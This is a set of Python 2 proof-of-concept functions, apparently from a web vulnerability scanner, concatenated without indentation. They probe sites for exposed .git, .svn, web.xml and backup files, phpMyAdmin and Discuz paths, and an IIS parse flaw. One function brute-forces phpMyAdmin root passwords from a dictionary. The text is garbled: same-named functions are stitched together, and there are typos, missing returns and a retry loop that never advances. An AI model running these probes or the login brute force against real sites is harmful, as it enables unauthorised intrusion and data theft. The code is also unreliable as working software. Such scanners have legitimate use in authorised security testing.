def poc(url):
testurl = urlhandler(url)
if not siteIndexTest(testurl):
return # '[SiteRequestErr-phpMyAdmin] %s' % testurl
pmd_path_result = []
for d in PHPMYADMIN_DICT:
payload = testurl + d
try:
r = requests.get(payload, headers=HEADERS, timeout=TIMEOUT,
verify=VERIFY)
if r.status_code == 200 and PHPMYADMIN_KEYWORD in r.content:
#pmd_path_result.append('[phpMyAdmin]-%s' % payload)
pmd_path_result.append(payload)
except Exception:
pass
PWD_OK_RESULT = []
if pmd_path_result:
for pmd_path in pmd_path_result:
for password in PHPMYADMIN_PASSWORD_DICT:
poc_data = {'pma_username': '******', 'pma_password': password}
try:
r = requests.post(pmd_path+'/index.php', data=poc_data, headers=HEADERS,
timeout=TIMEOUT, verify=VERIFY)
if r.status_code == 200 and PHPMYADMIN_LOGIN_OK_KWD in r.content:
PWD_OK_RESULT.append('[phpMyAdmin_PWD] '+pmd_path+'|root|'+password)
except Exception,e:
print e
def poc(url):
testurl = urlhandler(url)
payload = testurl
nodomain = urlparse.urlparse(payload).netloc
ip_list = ''
try:
ip_list = gethostbyname(str(nodomain.strip()))
except:
pass
try_cnt = 0
while True:
try:
r = requests.get(payload,
headers=HEADERS,
timeout=TIMEOUT,
verify=VERIFY,
stream=STREAM)
codesty = chardet.detect(r.content)
repcontent = r.content.decode(codesty['encoding'])
# print repcontent[:900]
ok_status_code = [200, 403, 404, 500, 502]
r_status_code = r.status_code
if r_status_code is not '':
if repcontent:
# header_list = []
# header_server = r.headers.get('Server')
# header_XPoweredBy = r.headers.get('X-Powered-By')
# if header_XPoweredBy is not None: header_list.append(header_XPoweredBy)
# if header_server is not None: header_list.append(header_server)
status_lst = []
url_title = re.search('<title>(.*)</title>', repcontent,
re.I | re.S)
if url_title:
url_title = url_title.group(1).strip()[:30]
if not r.history:
status_lst.append(r_status_code)
# loginfo = "{:<20} {:<10} {:<26} {:<20} {}".format(ip_list, status_lst, url, url_title, header_list)
loginfo = "{:<20} {:<10} {:<26} {}".format(
ip_list, status_lst, url, url_title)
else:
for code in r.history:
status_lst.append(code.status_code)
status_lst.append(r.status_code)
# loginfo = "{:<20} {:<10} {:<26} {:<20} {}".format(ip_list, status_lst, url, url_title, header_list)
loginfo = "{:<20} {:<10} {:<26} {}".format(
ip_list, status_lst, url, url_title)
return loginfo
else:
print '{} {}'.fromat(payload, r_status_code)
break
except Exception, e:
# print e
try_cnt += 1
if try_cnt >= RETRY_CNT:
return
def poc(url):
testurl = urlhandler(url)
payload = testurl + ".git/config"
try_cnt = 0
while True:
try:
r = requests.get(payload,
headers=HEADERS,
timeout=TIMEOUT,
verify=VERIFY)
if GIT_KEYWORD in r.content:
return '[Git_Leak] %s' % payload
break
except Exception:
if try_cnt >= RETRY_CNT:
return # '[RequestErr-Git_Leak] %s' % payload
def poc(url):
testurl = urlhandler(url)
if not siteIndexTest(testurl):
return # '[SiteRequestErr-iisparse] %s' % testurl
payload = testurl + "robots.txt/.php"
try:
r = requests.get(payload,
headers=HEADERS,
timeout=TIMEOUT,
verify=VERIFY)
if IISPARSE_KEYWORD in r.content:
return '[iis7.5_parse] %s' % payload
else:
return False
except Exception:
return False
def poc(url):
testurl = urlhandler(url)
if not siteIndexTest(testurl):
return # '[SiteRequestErr-Jquery] %s' % testurl
result = []
for path in JQUERY_DICT:
try:
payload = testurl + path.strip()
r = requests.get(payload,
headers=HEADERS,
timeout=TIMEOUT,
verify=VERIFY)
if r.status_code == 200 and JQUERY_KEYWORD in r.content:
result.append("[jQuery] " + payload)
except Exception, e:
pass
def poc(url):
testurl = urlhandler(url)
payload = testurl + "WEB-INF/web.xml"
try_cnt = 0
while True:
try:
r = requests.get(payload,
headers=HEADERS,
timeout=TIMEOUT,
verify=VERIFY)
if WEBXML_KEYWORD in r.content:
return '[WebXml_Leak] %s' % payload
break
except Exception, e:
try_cnt += 1
if try_cnt >= RETRY_CNT:
return # '[RequestErr-WebXml_Leak] %s' % payload
def poc(url):
testurl = urlhandler(url)
payload = testurl + ".svn/entries"
try_cnt = 0
while True:
try:
r = requests.get(payload,
headers=HEADERS,
timeout=TIMEOUT,
verify=VERIFY)
if SVN_KEYWORD in r.content:
return '[Svn_Leak] %s' % payload
break
except Exception, e:
try_cnt += 1
if try_cnt >= RETRY_CNT:
return # '[RequestErr-Svn_Leak] %s' % payload
def poc(url):
testurl = urlhandler(url)
if not siteIndexTest(testurl):
return # '[SiteRequestErr-phpMyAdmin] %s' % testurl
result = []
for d in PHPMYADMIN_DICT:
payload = testurl + d
try:
r = requests.get(payload,
headers=HEADERS,
timeout=TIMEOUT,
verify=VERIFY)
if r.status_code == 200 and PHPMYADMIN_KEYWORD in r.content:
result.append('[phpMyAdmin] %s' % payload)
except Exception:
pass
if result:
return result
def poc(url):
testurl = urlhandler(url)
if not siteIndexTest(testurl):
return # '[SiteRequestErr-Dz_tools] %s' % testurl
result = []
for v in DZ_TOOLS_DICT:
payload = testurl + v
try:
r = requests.get(payload,
headers=HEADERS,
timeout=TIMEOUT,
verify=VERIFY)
if r.status_code == 200 and DZ_TOOLS_KEYWORD in r.content:
result.append('[dz_tools] %s' % payload)
except Exception:
pass
if result:
return result
def audit(url):
parse = urlparse(url)
url_netloc = parse.netloc
url = urlhandler(url)
host_keys = url_netloc.split('.')
wwwlen = len(host_keys)
topdomainnopoint = ''
if wwwlen > 2:
for i in range(1, wwwlen):
topdomainnopoint += host_keys[i]
else:
for i in range(wwwlen):
topdomainnopoint += host_keys[i]
try:
realdomain = url_netloc
domainnopoint = realdomain.replace('.', '')
topdomain = realdomain.split('.', 1)[-1]
hosthead = host_keys[0]
domaincenter = host_keys[1]
domainunderline = realdomain.replace('.', '_')
topdomainunderline = topdomain.replace('.', '_')
domainDic = [
realdomain, domainnopoint, topdomainnopoint, topdomain, hosthead,
domaincenter, domainunderline, topdomainunderline
]
except:
return u"[BAKFILE] DomainHandlerError"
listFile = []
for i in BAKFILE_DICT:
listFile.append(i)
for s in BakFileSuffixFormat:
for d in domainDic:
if d + s not in listFile:
listFile.append(d + s)
warning_list = []
for payload in listFile:
vul_url = url + payload
try:
r = requests.get(vul_url,
headers=HEADERS,
timeout=TIMEOUT,
allow_redirects=ALLOW_REDIRECTS,
stream=STREAM,
verify=VERIFY)
contentType = r.headers["Content-Type"]
if r.status_code == 200 and "Content-Type" in r.headers \
and 'text/html' not in contentType \
and 'image/' not in contentType:
rarsize = int(r.headers.get('Content-Length'))
rarsize = rar_size(rarsize)
if rarsize == '0K':
pass
else:
warning_list.append("[BAKFILE] %s Size:%s %s" %
(vul_url, rarsize, contentType))
except Exception:
pass
if len(warning_list) < 10:
return warning_list
def poc(url):
testurl = urlhandler(url)
if not siteIndexTest(testurl):
return # '[SiteRequestErr-bakfile] %s' % testurl
return audit(testurl)